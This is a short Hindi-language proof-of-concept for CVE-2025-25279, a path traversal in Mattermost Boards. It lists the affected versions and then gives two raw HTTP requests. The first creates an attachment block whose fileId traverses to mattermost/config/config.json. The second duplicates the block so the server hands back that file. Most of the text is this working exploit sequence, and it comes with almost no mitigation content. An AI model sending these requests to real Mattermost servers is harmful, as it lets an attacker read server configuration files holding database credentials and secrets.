
CVE-2025-25279 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Mattermost Boards में पाथ ट्रैवर्सल, तैयार किए गए इम्पोर्ट आर्काइव और बोर्ड डुप्लिकेशन के माध्यम से मनमाना फ़ाइल पढ़ने की अनुमति देता है।
Mattermost Boards में एक फ़ाइल अपलोड करने के बाद, जब fileId पैरामीटर को संशोधित किया जाता है और बोर्ड की प्रतिलिपि बनाई जाती है, तो फ़ाइल अब पैरामीटर में निर्दिष्ट लक्ष्य फ़ाइल की ओर इंगित करती है और उसे डाउनलोड करती है।
प्रभावित संस्करण: Boards सक्षम के साथ Mattermost इंस्टेंस CVE: CVE-2025-25279
Mattermost संस्करण 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 बोर्ड आयात करते समय बोर्ड ब्लॉक्स को ठीक से मान्य नहीं करते हैं, जिससे एक हमलावर Boards में एक विशेष रूप से तैयार आयात संग्रह को आयात और निर्यात करके सिस्टम पर किसी भी मनमानी फ़ाइल को पढ़ सकता है।

POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
श्रेय मेरा नहीं है, समीक्षा शामिल है